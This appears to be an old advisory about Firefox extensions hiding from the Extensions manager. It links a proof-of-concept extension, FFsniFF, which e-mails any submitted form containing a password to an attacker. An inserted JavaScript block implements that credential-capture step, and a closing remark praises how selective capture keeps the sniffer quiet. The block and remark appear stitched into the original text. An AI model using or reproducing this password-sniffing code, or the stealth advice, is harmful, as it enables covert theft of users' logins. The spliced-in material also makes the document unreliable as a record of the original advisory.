
Firefox 3.0 security bug: Extensions can STILL hide themselves



Background
----------
Firefox is a very popular and secure web browser. It is used by millions of people
and thousands of internet clubs. One of Firefox's great features is extensions: you
can use them to build things inside your browser that go beyond your imagination.

Overview
--------
Every Firefox extension developer knows the 'hidden' property of the install
manifest (install.rdf). This property can be used to hide _globally_ installed
extensions only; it cannot hide extensions installed into a user's profile (this is
a design feature, so that extensions installed by users can't be hidden). But there
is another way to make an extension hidden...

Did you know that you can't trust what the Extensions manager tells you? For
detailed information look at the function 'hide_me()' in the file
'src/chrome/content/ffsniff/ffsniffOverlay_orig.js' of my PoC. This bug existed in
older versions of Firefox and was 'inherited' by Firefox 3. In practice this means
that an inventory of installed extensions has to be taken from the profile's
extensions directory on disk, not from the Extensions manager window.

Proof of Concept
----------------
As a PoC I updated my Firefox sniffer extension (FFsniFF) so that it is now
compatible with Firefox 3 (which was released today). You can download it here:
http://azurit.elbiahosting.sk/ffsniff/

The new version (0.3) was tested with Firefox 2.0 and 3.0.

FFsniFF is a simple Firefox extension which turns your browser into an HTML form
sniffer. Every time the user clicks a 'Submit' button, FFsniFF tries to find a
non-blank password field in the form. If one is found, the entire form (together
with its URL) is sent to a specified e-mail address. It also has the ability to
hide itself from the Extensions manager.
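The submit-time check that paragraph describes, as an added example written for this page and not FFsniFF's own source. It reads only the DOM form properties named in the comments (elements, action, name, type, value), leaves out the e-mail delivery step, and the two sample forms are constructed inline so the file runs under Node without a browser:

```javascript
// Added example, not FFsniFF code: the form check the advisory describes,
// written against the DOM form API so it can be attached to a real form's
// 'submit' event. The e-mail exfiltration step is deliberately omitted.

// True if the control is a password input holding a non-blank value.
function isNonBlankPassword(control) {
  return control.type === 'password' &&
    typeof control.value === 'string' &&
    control.value.trim() !== '';
}

// Inspect a form as the advisory describes: if it carries at least one
// non-blank password field, return a record of the page URL, the form's
// action and every named, non-button field; otherwise return null and the
// form is ignored. Assumption: only form.elements, form.action and each
// control's name/type/value are read, so a plain object of that shape works.
function captureForm(form, pageUrl) {
  const controls = Array.from(form.elements);
  if (!controls.some(isNonBlankPassword)) return null;
  const fields = {};
  for (const c of controls) {
    if (!c.name || c.type === 'submit' || c.type === 'button') continue;
    fields[c.name] = c.value;
  }
  return { url: pageUrl, action: form.action || pageUrl, fields };
}

// Browser-only wiring: run the check whenever the form is submitted and hand
// any captured record to the caller (onCapture is a hypothetical callback).
function watchForm(form, onCapture) {
  form.addEventListener('submit', () => {
    const rec = captureForm(form, String(location.href));
    if (rec) onCapture(rec);
  });
}

// Constructed sample input: a login form with the shape the DOM would expose.
const sampleLoginForm = {
  action: 'https://example.test/login',
  elements: [
    { name: 'user', type: 'text', value: 'alice' },
    { name: 'pass', type: 'password', value: 'hunter2' },
    { name: 'remember', type: 'checkbox', value: 'on' },
    { name: '', type: 'submit', value: 'Log in' },
  ],
};

// Constructed sample input: a form with no password field, which is ignored.
const sampleSearchForm = {
  action: '/search',
  elements: [{ name: 'q', type: 'text', value: 'firefox' }],
};
```

Only forms that actually carry a filled-in password field produce a record, which is why a search box or a newsletter signup passes through untouched; that selectivity is what keeps a sniffer like this quiet on ordinary browsing.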

Solution
--------
There is no solution for this problem at this time.

azurIt, azurIt@IRCnet, azurit (at) pobox (dot) sk


